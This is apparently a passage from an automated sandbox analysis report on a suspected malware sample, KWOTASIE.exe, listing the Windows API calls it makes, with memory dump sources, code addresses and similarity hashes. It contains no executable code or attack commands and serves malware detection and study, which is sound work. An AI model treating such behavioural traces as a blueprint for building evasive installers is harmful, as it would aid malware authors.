              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
              • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
              • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
              • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
              APIs
              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
              • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CloseDeleteValue
              • String ID:
              • API String ID: 2831762973-0
              • Opcode ID: 457e49028b24503373c7101f91d519fe0e0cb9d2b65fc59e945bc12d3e93dce8
              • Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
              • Opcode Fuzzy Hash: 457e49028b24503373c7101f91d519fe0e0cb9d2b65fc59e945bc12d3e93dce8
              • Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D
              APIs
              • OleInitialize.OLE32(00000000), ref: 00405393
                • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
              • OleUninitialize.OLE32(00000404,00000000), ref: 004053DF
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: InitializeMessageSendUninitialize
              • String ID:
              • API String ID: 2896919175-0
              • Opcode ID: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
              • Instruction ID: 26d04017d7367bbfa1c35918477487f98c57589759ea251963dc576d4d611ade
              • Opcode Fuzzy Hash: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
              • Instruction Fuzzy Hash: 98F09072610A00DBE2115754AD01B167764EB80395F15447EFE84A23E196BA48128B7E
              APIs
              • ShowWindow.USER32(00000000,00000000), ref: 00401E61
              • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Window$EnableShow
              • String ID:
              • API String ID: 1136574915-0
              • Opcode ID: 9e33769c6835595f85522694bbc6999b5b18b2ef09c7d62b849b7c27b2d9430a
              • Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
              • Opcode Fuzzy Hash: 9e33769c6835595f85522694bbc6999b5b18b2ef09c7d62b849b7c27b2d9430a
              • Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: ShowWindow
              • String ID:
              • API String ID: 1268545403-0
              • Opcode ID: d3cd2513376d6ed837743d205884ae6d5d4bf336396e546168d2a5417aa6c254
              • Instruction ID: f017f9f214282da9378315d684086af48e7312a2d574c5b78b61c32a83121298
              • Opcode Fuzzy Hash: d3cd2513376d6ed837743d205884ae6d5d4bf336396e546168d2a5417aa6c254
              • Instruction Fuzzy Hash: 45E086367001059FCB25DBA4ED848BE77A6EB48310758057FE902F36A1CA759D51CF68
              APIs
              • GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
              • GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
                • Part of subcall function 004065B6: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
              • String ID:
              • API String ID: 2547128583-0
              • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
              • Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
              • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
              • Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E
              APIs
              • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\KWOTASIE.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
              • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
              • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
              • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
              APIs
              • GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405D32
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
              • Instruction ID: 51a2066edc4c2a81eeb0428f2148d4bf8de4f40e885bab3ef7b7d11008f75862
              • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
              • Instruction Fuzzy Hash: 72D0C972505420ABC2512728AF0C89BBB95DB542717028B35FAA9A22B0CB304C569A98
              APIs
              • CloseHandle.KERNEL32(FFFFFFFF,004036B3,00000006,?,00000006,00000008,0000000A), ref: 0040388B
              Strings
              • C:\Users\user\AppData\Local\Temp\nsy202D.tmp\, xrefs: 0040389F
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CloseHandle
              • String ID: C:\Users\user\AppData\Local\Temp\nsy202D.tmp\
              • API String ID: 2962429428-2866753206
              • Opcode ID: 3e7d8f837ec8d19fef405a95e7c850f01c78b23dd260e21e658a4d11ca10c239
              • Instruction ID: 7bab629218a8e1e0f7d71be1c46fcb2fd62ec8adf6c09ffa828ee9bd00e33add
              • Opcode Fuzzy Hash: 3e7d8f837ec8d19fef405a95e7c850f01c78b23dd260e21e658a4d11ca10c239
              • Instruction Fuzzy Hash: BBC0223040070092C0203F348E0F6043A54AB0133AB60437AB0BCB00F0CB3C026D450D
              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00405802
              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CreateDirectoryErrorLast
              • String ID:
              • API String ID: 1375471231-0
              • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
              • Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
              • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
              • Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D
              APIs
              • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: FileMove
              • String ID:
              • API String ID: 3562171763-0
              • Opcode ID: 086139f37eecdad42f9a8148f2945bf0a7eb9630c8e35c0a5069e5dc0bb59789
              • Instruction ID: 3e6e6754c95f31a417227132d94fb2ae884618af556d43a54845cec5a9764f61
              • Opcode Fuzzy Hash: 086139f37eecdad42f9a8148f2945bf0a7eb9630c8e35c0a5069e5dc0bb59789
              • Instruction Fuzzy Hash: 20F02431608114A7CB20BBA54F0DE6F61648F963A8F24073FB011B22E1EABC8902956F
              APIs
              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: PrivateProfileStringWrite
              • String ID:
              • API String ID: 390214022-0
              • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
              • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
              • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
              • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
              APIs
              • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: PathSearch
              • String ID:
              • API String ID: 2203818243-0
              • Opcode ID: 7ae626cc8d750fa8de7ee35a0cf39963b00ce32650e35613724d1236d3882a7a
              • Instruction ID: b823128ae195addc5a2e7fdaef51ba51a72722c893b502689f98c942922f21f8
              • Opcode Fuzzy Hash: 7ae626cc8d750fa8de7ee35a0cf39963b00ce32650e35613724d1236d3882a7a
              • Instruction Fuzzy Hash: 91E0D872304100AFD710DBA4DE48AAB7358DF00368B20413AB111E51C1D6B44901976D
              APIs
              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406110
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
